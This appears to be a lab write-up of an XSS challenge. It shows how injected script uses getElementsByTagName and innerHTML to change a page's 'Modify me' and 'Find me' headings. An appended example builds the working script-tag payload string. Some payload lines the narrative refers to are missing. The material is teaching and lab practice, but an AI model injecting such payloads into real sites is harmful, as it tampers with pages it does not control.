The objectives of the challenge were:
1) Modify the text “Modify me” to “Modified you”
2) Modify the text “Find me” to “Found you”
The first rule a pentester should follow is to be systematic. Don't jump straight in with a pile of payloads before carefully analysing the conditions. In this challenge, the first step is to check whether the page is vulnerable to XSS at all, so let's try a basic payload to test it:
As you can see, the text "Modify me" is inside an h2 tag. You can also see two empty (content-less) h2 tags above it, which means our h2 tag is in the third position. Our aim now is to modify the HTML inside the third h2 tag. A straightforward way to change the innerHTML of an element is to select it with getElementsByTagName and then assign to its innerHTML:
getElementsByTagName returns a live HTMLCollection of all elements with the given tag name, in document order, and it is indexed from 0.
getElementsByTagName("h2") therefore returns the list of every h2 element in the page. In this challenge we need to modify the third h2 tag, which is index 2 of that list (the first h2 is index 0, the second is index 1). So we modified the payload slightly to select index 2:
getElementsByTagName("h2")[2] selects the third h2 tag; to change the HTML inside it, we assign to its innerHTML.
The second task is to modify the text "Find me" to "Found you". If you check the source code again, you can see that there is only one h1 tag in the entire document, which makes our work much easier. To modify it, we add one more line to the code above, and the payload becomes:
Since there is only one h1 tag, we use index [0] to select it. With this payload, you can complete the challenge.
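The two DOM edits described above, as an added example that is not part of the original write-up and not the challenge's own code. It wraps the edits in a function, guards the indices (a payload that indexes past the end of the collection throws a TypeError and the injection silently does nothing), builds the equivalent inline script-tag payload string, and includes a constructed stand-in document (two empty h2s, the target h2, one h1) so the logic can be exercised offline under Node; the stand-in is an assumption about the page's markup, not the real page.

```javascript
// Added example: the challenge's two DOM modifications, with a guard and
// a constructed stand-in document for running outside a browser.

// Apply both modifications to a document-like object.
// getElementsByTagName is zero-indexed: [2] is the third h2, [0] the first h1.
function solveChallenge(doc) {
  const h2s = doc.getElementsByTagName('h2');
  const h1s = doc.getElementsByTagName('h1');
  // Guard the indices: with fewer than three h2s (or no h1) the unguarded
  // one-liner would throw and the injected script would have no effect.
  if (h2s.length < 3 || h1s.length < 1) {
    return false;
  }
  h2s[2].innerHTML = 'Modified you';
  h1s[0].innerHTML = 'Found you';
  return true;
}

// The same two statements as a string ready to drop into the injection point.
// The closing tag is written as "<\/script>" so this source can itself sit
// inside an inline <script> without the HTML parser ending it early.
function buildPayload() {
  return '<script>' +
    'document.getElementsByTagName("h2")[2].innerHTML="Modified you";' +
    'document.getElementsByTagName("h1")[0].innerHTML="Found you";' +
    '<\/script>';
}

// Constructed stand-in for the challenge page (an assumption about its
// layout): two empty h2s, the target h2, and a single h1.
function makeFakeDocument() {
  const elements = [
    { tagName: 'H2', innerHTML: '' },
    { tagName: 'H2', innerHTML: '' },
    { tagName: 'H2', innerHTML: 'Modify me' },
    { tagName: 'H1', innerHTML: 'Find me' },
  ];
  return {
    // Returns the matching element objects in document order, like the
    // real method; the objects are shared, so edits persist across calls.
    getElementsByTagName(tag) {
      return elements.filter((e) => e.tagName === tag.toUpperCase());
    },
  };
}

// In a browser this runs against the real page; under Node it uses the stand-in.
const doc = typeof document !== 'undefined' ? document : makeFakeDocument();
solveChallenge(doc);
```

Because the task only replaces text, assigning to textContent would do the same job without parsing the value as HTML; innerHTML is used here only because that is what the challenge and the write-up rely on.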
The solution written above is the way we solved the problem, and it may differ from the solution videos provided by SecurityTube. To watch the solution video, you need to subscribe to PentesterAcademy.
We hope you liked this challenge. If there is anything you didn't understand or would like more clarity on, please leave a comment and we will be more than happy to help. Happy pentesting.